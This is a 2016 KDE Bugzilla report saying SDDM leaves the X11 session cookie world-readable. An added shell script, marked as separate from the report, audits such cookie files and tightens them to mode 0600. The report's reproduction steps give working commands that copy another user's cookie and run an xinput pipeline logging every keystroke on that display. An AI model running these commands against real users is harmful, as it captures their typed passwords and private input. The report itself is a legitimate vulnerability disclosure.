[www.kde.org] [Bug 363140] New: World-readable X11 Cookie, easy key logger

David Rumley via KDE Bugzilla bugzilla_noreply at kde.org
Mon May 16 15:55:02 UTC 2016


            Bug ID: 363140
           Summary: World-readable X11 Cookie, easy key logger
           Product: www.kde.org
           Version: unspecified
          Platform: Archlinux Packages
                OS: Linux
            Status: UNCONFIRMED
          Severity: normal
          Priority: NOR
         Component: general
          Assignee: kde-www at kde.org
          Reporter: Davidl.Rumley at gmail.com

After logging in as any user, you are able to get the X11 cookie and start a
key logger. This has been tested on a F23 system with KDE / SDDM (with current
patches) and an Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1).

You are able to easily get the X11 cookie.
$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8  .Xauthority

$ sha256sum /tmp/xauth-1000-_0

The cookie is world-readable, even if you change the permissions to the cookie,
after a reboot the changes are gone.
$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0

I have another user that I log in via the text console; after that you just need
to start the typical X11 keylogger.
$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 xinput test

Reproducible: Always

Steps to Reproduce:
1. Login via the text console on any user.
2. Copy the X11 cookie over to the .Xauthority file of the user you just logged in as.
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 xinput test

Actual Results:  
After running the commands listed in "Steps to Reproduce" section, all the
keyboard pushes are printed to the text console.

Expected Results:  
The X11 cookie should not be world-readable.
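An added audit script (not part of the bug report, nor KDE or SDDM code) that checks whether the per-session cookie files the report describes are readable by anyone other than their owner, and can tighten them to 0600. The directory to scan and the xauth-* name pattern are assumptions taken from the report's paths; since the report notes that a manual chmod is undone at reboot, this belongs in a login hook rather than being run once.

```shell
#!/bin/sh
# Added example: audit X11 cookie files in a directory for group/other read
# permission. Assumes the /tmp/xauth-<uid>-_<display> naming seen in the report.

# xauth_cookie_private FILE
#   returns 0 if only the owner can read FILE, 1 if group or other can,
#   2 if FILE does not exist.
xauth_cookie_private() {
    [ -f "$1" ] || return 2
    perm=$(ls -ld "$1" | cut -c1-10)         # e.g. -rw-r--r--
    grp_r=$(printf '%s' "$perm" | cut -c5)   # group read bit
    oth_r=$(printf '%s' "$perm" | cut -c8)   # other read bit
    [ "$grp_r" = "-" ] && [ "$oth_r" = "-" ]
}

# audit_xauth_dir DIR [fix]
#   prints every cookie under DIR that group or other can read; with the
#   word "fix" as second argument it also restricts the file to mode 0600.
#   Exit status is the number of offending files found (0 = clean).
audit_xauth_dir() {
    dir="$1"; action="$2"; bad=0
    for f in "$dir"/xauth-*; do
        [ -f "$f" ] || continue              # no match leaves the literal pattern
        if ! xauth_cookie_private "$f"; then
            bad=$((bad + 1))
            echo "readable by others: $f ($(ls -ld "$f" | cut -c1-10))"
            if [ "$action" = "fix" ]; then
                chmod 0600 "$f"
            fi
        fi
    done
    return "$bad"
}
```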
